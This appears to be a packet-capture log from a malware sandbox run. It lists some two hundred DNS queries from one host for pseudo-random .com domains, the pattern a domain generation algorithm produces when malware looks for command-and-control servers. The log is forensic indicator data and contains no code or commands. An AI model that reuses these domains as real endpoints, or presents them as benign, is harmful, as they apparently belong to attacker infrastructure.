Nov 11, 2024 18:13:44.875861883 CET	192.168.2.6	1.1.1.1	0x1f2c	Standard query (0)	qedyvuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.876092911 CET	192.168.2.6	1.1.1.1	0xf005	Standard query (0)	vonyrot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.891074896 CET	192.168.2.6	1.1.1.1	0xa5ce	Standard query (0)	volyjym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.892286062 CET	192.168.2.6	1.1.1.1	0x3eb8	Standard query (0)	pufybop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.892474890 CET	192.168.2.6	1.1.1.1	0x55db	Standard query (0)	qegynap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.893435001 CET	192.168.2.6	1.1.1.1	0x10	Standard query (0)	pujymel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.893605947 CET	192.168.2.6	1.1.1.1	0xed5d	Standard query (0)	pupydig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.907352924 CET	192.168.2.6	1.1.1.1	0x66b2	Standard query (0)	lykymyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.907560110 CET	192.168.2.6	1.1.1.1	0x70a1	Standard query (0)	qekyqyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.909473896 CET	192.168.2.6	1.1.1.1	0x58ce	Standard query (0)	vopydum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.909873009 CET	192.168.2.6	1.1.1.1	0x2cf6	Standard query (0)	vofydut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.910161972 CET	192.168.2.6	1.1.1.1	0xbddb	Standard query (0)	gadyvis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.910307884 CET	192.168.2.6	1.1.1.1	0xf23d	Standard query (0)	pupycuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.910679102 CET	192.168.2.6	1.1.1.1	0x1e33	Standard query (0)	lyvylod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.910837889 CET	192.168.2.6	1.1.1.1	0xcd65	Standard query (0)	lyrysyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.910978079 CET	192.168.2.6	1.1.1.1	0xcf63	Standard query (0)	purypyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.911319017 CET	192.168.2.6	1.1.1.1	0x1fa2	Standard query (0)	galyheh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.911879063 CET	192.168.2.6	1.1.1.1	0x5ac3	Standard query (0)	lysyvud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.914573908 CET	192.168.2.6	1.1.1.1	0xfa61	Standard query (0)	pumytol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.916268110 CET	192.168.2.6	1.1.1.1	0x5125	Standard query (0)	lykygaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.928520918 CET	192.168.2.6	1.1.1.1	0xba2d	Standard query (0)	puvywup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.930885077 CET	192.168.2.6	1.1.1.1	0x31d	Standard query (0)	qexykug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.942306995 CET	192.168.2.6	1.1.1.1	0xd838	Standard query (0)	lyxyjun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.942734003 CET	192.168.2.6	1.1.1.1	0x854a	Standard query (0)	ganyriz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.950364113 CET	192.168.2.6	1.1.1.1	0x633e	Standard query (0)	gacyqys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.950545073 CET	192.168.2.6	1.1.1.1	0x6287	Standard query (0)	gaqyzoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.950869083 CET	192.168.2.6	1.1.1.1	0xa15f	Standard query (0)	qetyxeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.951042891 CET	192.168.2.6	1.1.1.1	0xbdf6	Standard query (0)	vofybic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.146270990 CET	192.168.2.6	1.1.1.1	0xb00	Standard query (0)	vopycyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.352404118 CET	192.168.2.6	1.1.1.1	0x1bb0	Standard query (0)	puryxag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.839503050 CET	192.168.2.6	1.1.1.1	0x435b	Standard query (0)	lygynox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.126096010 CET	192.168.2.6	1.1.1.1	0x2110	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.127681971 CET	192.168.2.6	1.1.1.1	0x44ef	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.127979994 CET	192.168.2.6	1.1.1.1	0x6619	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.128629923 CET	192.168.2.6	1.1.1.1	0xab32	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.129401922 CET	192.168.2.6	1.1.1.1	0xcb28	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.133819103 CET	192.168.2.6	1.1.1.1	0x3410	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.133966923 CET	192.168.2.6	1.1.1.1	0xf2	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.043493986 CET	192.168.2.6	1.1.1.1	0x6d40	Standard query (0)	qedysyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.049297094 CET	192.168.2.6	1.1.1.1	0x4f2f	Standard query (0)	pumyliq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.061745882 CET	192.168.2.6	1.1.1.1	0x97da	Standard query (0)	qetytav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.061852932 CET	192.168.2.6	1.1.1.1	0x595c	Standard query (0)	vocyjet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.062071085 CET	192.168.2.6	1.1.1.1	0xaf83	Standard query (0)	ganykuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.082067966 CET	192.168.2.6	1.1.1.1	0xb49e	Standard query (0)	galynab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.082319021 CET	192.168.2.6	1.1.1.1	0x362a	Standard query (0)	volymaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.082673073 CET	192.168.2.6	1.1.1.1	0x6ad8	Standard query (0)	qekynog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.104826927 CET	192.168.2.6	1.1.1.1	0x3c32	Standard query (0)	gahyvuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.110718012 CET	192.168.2.6	1.1.1.1	0x45bf	Standard query (0)	puvyjyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.125293970 CET	192.168.2.6	1.1.1.1	0x42db	Standard query (0)	lykynon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.167429924 CET	192.168.2.6	1.1.1.1	0x90ac	Standard query (0)	qebykul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.170120955 CET	192.168.2.6	1.1.1.1	0x1021	Standard query (0)	pujybig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.176233053 CET	192.168.2.6	1.1.1.1	0x9aee	Standard query (0)	gatypas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.183396101 CET	192.168.2.6	1.1.1.1	0x2322	Standard query (0)	lyvyjyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.183921099 CET	192.168.2.6	1.1.1.1	0x863	Standard query (0)	vonykuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.183957100 CET	192.168.2.6	1.1.1.1	0xc9db	Standard query (0)	lysysyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.186933041 CET	192.168.2.6	1.1.1.1	0x7861	Standard query (0)	vojybim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.215873957 CET	192.168.2.6	1.1.1.1	0x24cc	Standard query (0)	qexynol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.216181040 CET	192.168.2.6	1.1.1.1	0x1565	Standard query (0)	lyrytod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.218878984 CET	192.168.2.6	1.1.1.1	0x9b22	Standard query (0)	pufypeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.266604900 CET	192.168.2.6	1.1.1.1	0x430a	Standard query (0)	puvymaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.268773079 CET	192.168.2.6	1.1.1.1	0x8693	Standard query (0)	purytov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.269567966 CET	192.168.2.6	1.1.1.1	0x137b	Standard query (0)	gaqykus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.278630972 CET	192.168.2.6	1.1.1.1	0xcbb2	Standard query (0)	pupypep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.278887987 CET	192.168.2.6	1.1.1.1	0xa754	Standard query (0)	vowykuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.281045914 CET	192.168.2.6	1.1.1.1	0xd779	Standard query (0)	lygysen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.281270027 CET	192.168.2.6	1.1.1.1	0x3616	Standard query (0)	gacyhez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.287329912 CET	192.168.2.6	1.1.1.1	0x702b	Standard query (0)	qegyvuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.331530094 CET	192.168.2.6	1.1.1.1	0x477	Standard query (0)	gacynow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.380912066 CET	192.168.2.6	1.1.1.1	0xb0f2	Standard query (0)	purylup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.384452105 CET	192.168.2.6	1.1.1.1	0x900f	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.416707039 CET	192.168.2.6	1.1.1.1	0xfe66	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.417459011 CET	192.168.2.6	1.1.1.1	0x1dd9	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.510994911 CET	192.168.2.6	1.1.1.1	0x8630	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.632997036 CET	192.168.2.6	1.1.1.1	0x38e7	Standard query (0)	qekyfiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.714425087 CET	192.168.2.6	1.1.1.1	0x42eb	Standard query (0)	galyfis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.783746958 CET	192.168.2.6	1.1.1.1	0xd6be	Standard query (0)	vonyqym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.784132004 CET	192.168.2.6	1.1.1.1	0xdfd2	Standard query (0)	lyvymej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.784465075 CET	192.168.2.6	1.1.1.1	0x13eb	Standard query (0)	gahydyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.785881042 CET	192.168.2.6	1.1.1.1	0x3713	Standard query (0)	pufycyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.786401033 CET	192.168.2.6	1.1.1.1	0x9a7c	Standard query (0)	vowyrif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.786997080 CET	192.168.2.6	1.1.1.1	0x899c	Standard query (0)	gaqyrib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.787545919 CET	192.168.2.6	1.1.1.1	0xf176	Standard query (0)	qexyhap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.787816048 CET	192.168.2.6	1.1.1.1	0x4256	Standard query (0)	lymywun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.788305998 CET	192.168.2.6	1.1.1.1	0x2199	Standard query (0)	qeqyrug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.788837910 CET	192.168.2.6	1.1.1.1	0x743e	Standard query (0)	vofycyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.789521933 CET	192.168.2.6	1.1.1.1	0xbdf8	Standard query (0)	puzygop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.790597916 CET	192.168.2.6	1.1.1.1	0x744c	Standard query (0)	gadycew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.791135073 CET	192.168.2.6	1.1.1.1	0xb2da	Standard query (0)	lysyxar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.791665077 CET	192.168.2.6	1.1.1.1	0xecc7	Standard query (0)	pupyxal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.792172909 CET	192.168.2.6	1.1.1.1	0xce1d	Standard query (0)	volygoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.808374882 CET	192.168.2.6	1.1.1.1	0xf202	Standard query (0)	lyxygax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.808612108 CET	192.168.2.6	1.1.1.1	0xa13b	Standard query (0)	qedyxel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.065736055 CET	192.168.2.6	1.1.1.1	0x1876	Standard query (0)	ganyqyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.698559999 CET	192.168.2.6	1.1.1.1	0x94b2	Standard query (0)	qebyqeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.718476057 CET	192.168.2.6	1.1.1.1	0xe851	Standard query (0)	vopypec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.719513893 CET	192.168.2.6	1.1.1.1	0x5e83	Standard query (0)	lykyfud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.719968081 CET	192.168.2.6	1.1.1.1	0x9824	Standard query (0)	gatyzoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.720318079 CET	192.168.2.6	1.1.1.1	0xda03	Standard query (0)	pujyduv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.731971025 CET	192.168.2.6	1.1.1.1	0x2ff2	Standard query (0)	pumywug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.763838053 CET	192.168.2.6	1.1.1.1	0xd29f	Standard query (0)	vopyzot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.764014959 CET	192.168.2.6	1.1.1.1	0xdb98	Standard query (0)	qegysyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.764663935 CET	192.168.2.6	1.1.1.1	0xa1dd	Standard query (0)	vojyduf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.764872074 CET	192.168.2.6	1.1.1.1	0xd244	Standard query (0)	lyrylix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.786791086 CET	192.168.2.6	1.1.1.1	0x101a	Standard query (0)	vocymak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.411056995 CET	192.168.2.6	1.1.1.1	0x10f7	Standard query (0)	qetylip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.769731998 CET	192.168.2.6	1.1.1.1	0x96b6	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.774771929 CET	192.168.2.6	1.1.1.1	0x53cd	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.775136948 CET	192.168.2.6	1.1.1.1	0xa62	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.775300026 CET	192.168.2.6	1.1.1.1	0xff47	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.936419964 CET	192.168.2.6	1.1.1.1	0xaa5e	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.951603889 CET	192.168.2.6	1.1.1.1	0xcdd6	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.982393026 CET	192.168.2.6	1.1.1.1	0xb3cf	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.982424021 CET	192.168.2.6	1.1.1.1	0x4d55	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:49.983995914 CET	192.168.2.6	1.1.1.1	0x2532	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.833988905 CET	192.168.2.6	1.1.1.1	0xb9ec	Standard query (0)	qebyniv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.836183071 CET	192.168.2.6	1.1.1.1	0x9d13	Standard query (0)	pujypal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.875200987 CET	192.168.2.6	1.1.1.1	0x4dca	Standard query (0)	gatykyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.880610943 CET	192.168.2.6	1.1.1.1	0x675e	Standard query (0)	vojypat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.884264946 CET	192.168.2.6	1.1.1.1	0x6513	Standard query (0)	puvybuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:51.954066992 CET	192.168.2.6	1.1.1.1	0x1677	Standard query (0)	qetykyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.005012035 CET	192.168.2.6	1.1.1.1	0x6722	Standard query (0)	puryjeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.005918026 CET	192.168.2.6	1.1.1.1	0xef48	Standard query (0)	vopykum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.011594057 CET	192.168.2.6	1.1.1.1	0x8b27	Standard query (0)	vocybuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.709166050 CET	192.168.2.6	1.1.1.1	0x84da	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.850207090 CET	192.168.2.6	1.1.1.1	0xc8fd	Standard query (0)	volybut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.858375072 CET	192.168.2.6	1.1.1.1	0xfa9b	Standard query (0)	pumyjev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.858397961 CET	192.168.2.6	1.1.1.1	0x18ea	Standard query (0)	qebyhag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.858697891 CET	192.168.2.6	1.1.1.1	0x9875	Standard query (0)	lysylun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.858872890 CET	192.168.2.6	1.1.1.1	0x2662	Standard query (0)	qedytoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.859236956 CET	192.168.2.6	1.1.1.1	0x9601	Standard query (0)	lykyvyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.879626036 CET	192.168.2.6	1.1.1.1	0xb263	Standard query (0)	lyxyfuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.881638050 CET	192.168.2.6	1.1.1.1	0xb5fb	Standard query (0)	gadyzib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.881968975 CET	192.168.2.6	1.1.1.1	0x980b	Standard query (0)	gadypah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.882330894 CET	192.168.2.6	1.1.1.1	0x9dfc	Standard query (0)	puzybil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.884896994 CET	192.168.2.6	1.1.1.1	0xf7ed	Standard query (0)	galyvuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.885122061 CET	192.168.2.6	1.1.1.1	0x50fc	Standard query (0)	lyvynid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.885312080 CET	192.168.2.6	1.1.1.1	0xd3d6	Standard query (0)	lymymax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.885504007 CET	192.168.2.6	1.1.1.1	0x3d2e	Standard query (0)	puzyduq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.885874987 CET	192.168.2.6	1.1.1.1	0x3bf9	Standard query (0)	lymyjyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.888515949 CET	192.168.2.6	1.1.1.1	0x4422	Standard query (0)	vofyzof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.890346050 CET	192.168.2.6	1.1.1.1	0xb5f	Standard query (0)	qeqyqep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.896321058 CET	192.168.2.6	1.1.1.1	0x4986	Standard query (0)	pufyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.896620989 CET	192.168.2.6	1.1.1.1	0x60c5	Standard query (0)	qexyfuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.935523033 CET	192.168.2.6	1.1.1.1	0xa15b	Standard query (0)	vowyqyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.935756922 CET	192.168.2.6	1.1.1.1	0x1cb7	Standard query (0)	gacyfih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.935842991 CET	192.168.2.6	1.1.1.1	0x6c80	Standard query (0)	lygyxad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.936016083 CET	192.168.2.6	1.1.1.1	0x83c2	Standard query (0)	purywyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.936288118 CET	192.168.2.6	1.1.1.1	0x913a	Standard query (0)	qegyxav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.936554909 CET	192.168.2.6	1.1.1.1	0x5072	Standard query (0)	ganynos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.936749935 CET	192.168.2.6	1.1.1.1	0xb876	Standard query (0)	lyxynir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.942032099 CET	192.168.2.6	1.1.1.1	0xcb38	Standard query (0)	vonyjef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.942205906 CET	192.168.2.6	1.1.1.1	0x39b7	Standard query (0)	vofypam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.942363024 CET	192.168.2.6	1.1.1.1	0x31f	Standard query (0)	pupytiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.942570925 CET	192.168.2.6	1.1.1.1	0xa351	Standard query (0)	qegytop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.943293095 CET	192.168.2.6	1.1.1.1	0x4908	Standard query (0)	gaqyqez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950253963 CET	192.168.2.6	1.1.1.1	0xa0dd	Standard query (0)	qekysel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950419903 CET	192.168.2.6	1.1.1.1	0xdd26	Standard query (0)	lysytoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950577974 CET	192.168.2.6	1.1.1.1	0xe240	Standard query (0)	qekyvup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950715065 CET	192.168.2.6	1.1.1.1	0xfe35	Standard query (0)	qeqykyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950856924 CET	192.168.2.6	1.1.1.1	0x4a17	Standard query (0)	vonymoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.950985909 CET	192.168.2.6	1.1.1.1	0x4ecf	Standard query (0)	pumymap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.951160908 CET	192.168.2.6	1.1.1.1	0x2264	Standard query (0)	galydyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.951176882 CET	192.168.2.6	1.1.1.1	0xf2b6	Standard query (0)	volydyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.951354980 CET	192.168.2.6	1.1.1.1	0xe808	Standard query (0)	ganyhab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.951386929 CET	192.168.2.6	1.1.1.1	0xa312	Standard query (0)	qedylig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.958671093 CET	192.168.2.6	1.1.1.1	0xdf53	Standard query (0)	vopyrik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.958925009 CET	192.168.2.6	1.1.1.1	0xdae1	Standard query (0)	lyvygon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959069967 CET	192.168.2.6	1.1.1.1	0xa67d	Standard query (0)	pujycyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959285975 CET	192.168.2.6	1.1.1.1	0x59cf	Standard query (0)	qetyrul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959541082 CET	192.168.2.6	1.1.1.1	0xe908	Standard query (0)	gatyruw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959721088 CET	192.168.2.6	1.1.1.1	0xb5ce	Standard query (0)	gahyces.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.959940910 CET	192.168.2.6	1.1.1.1	0x4cbe	Standard query (0)	vocygim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.960211039 CET	192.168.2.6	1.1.1.1	0xd843	Standard query (0)	vojycec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.960433960 CET	192.168.2.6	1.1.1.1	0xabd5	Standard query (0)	lyrywur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.960741997 CET	192.168.2.6	1.1.1.1	0xf760	Standard query (0)	puvygog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.963376999 CET	192.168.2.6	1.1.1.1	0x1ae	Standard query (0)	lyryjej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.965635061 CET	192.168.2.6	1.1.1.1	0x9c58	Standard query (0)	pupylug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.965799093 CET	192.168.2.6	1.1.1.1	0x8b49	Standard query (0)	gahypoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:52.966116905 CET	192.168.2.6	1.1.1.1	0xfe61	Standard query (0)	lykyser.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.097714901 CET	192.168.2.6	1.1.1.1	0xc8d7	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.098074913 CET	192.168.2.6	1.1.1.1	0x7309	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.098351002 CET	192.168.2.6	1.1.1.1	0xa106	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.291706085 CET	192.168.2.6	1.1.1.1	0x7e3f	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.292710066 CET	192.168.2.6	1.1.1.1	0xaaf6	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.614945889 CET	192.168.2.6	1.1.1.1	0x88c5	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.930306911 CET	192.168.2.6	1.1.1.1	0xef08	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.959090948 CET	192.168.2.6	1.1.1.1	0x4bd4	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.959578991 CET	192.168.2.6	1.1.1.1	0x53e1	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:53.974843025 CET	192.168.2.6	1.1.1.1	0xb081	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:54.018883944 CET	192.168.2.6	1.1.1.1	0xe5f1	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
